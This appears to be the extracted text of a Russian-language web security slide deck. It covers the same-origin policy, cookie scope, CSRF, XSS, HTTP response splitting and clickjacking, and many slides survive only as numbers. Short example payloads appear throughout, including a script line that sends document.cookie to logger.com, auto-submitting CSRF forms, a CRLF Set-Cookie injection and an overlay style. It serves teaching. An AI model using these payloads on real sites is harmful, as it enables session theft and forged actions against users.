Post on 15-Jun-2015
2
3
- Браузер- Место положения- Открытые сессии- Пользователь
4
PROTOCOL://DOMAIN:port
Одинаковый источник:http://example.com/http://example.com/folder/
Разный источник:http://example.com/https://example.com/http://test.example.com/http://example.com:8080/http://othersample.com/
5
http://kiwi.com/test_restrict.html
6
http://kiwi.com/test_restrict.html
7
http://kiwi.com/test_restrict.html
8
http://kiwi.com/test_restrict.html
9
http://kiwi.com/test_restrict.html
http://kiwi.com/src_restrict.html
10
http://www.kiwi.com/test_restrict.html
11
XMLHttpRequest
- Метод запроса- Заголовок запроса- Чтение заголовков- Чтение ответа
12
..domain=.target.com – любой поддомен target.com
ограничения:- время жизни (expires,max-age) - локация (path, domain)- дополнительные аттрибуты (httponly, secure)
13
14
link
code req1 req2
15
…<img src=‘http://target.com/killme?id=1’>…
…<form action=‘http://target.com/killme’><input type=hidden name=id value=1></form>… <script>submitForm()</script>
16
link link
Injected responce
17
18
19
20
21
22
document.write()document.writeln()eval().innerHTMLetc
flash:getURL(_root.param,”_blank”)
23
…new Image().src="http://logger.com/?c="+encodeURI(document.cookie);…
24
25
26
27
28
29
…Location: <user input> …
http://target.com?jump=<user input>
http://target.com?jump=hell%0d%0aSet-Cookie: gotohell%3d1
…Location: hellSet-Cookie: gotohell=1 …
30
31
Split (target.com/somevuln/)
target.com
target (target.com/admin/)
32
Split (target.com/somevuln/)
target.com
target (target.com/admin/)
33
target.com
34
target.com
Fake target (target.com/admin/)
…<form action=“evilsite.com”>…
35
Upgrade
Upgrade
36
37
...style='position:absolute;
left:0px;
top:0px;
z-index:10000;'...
38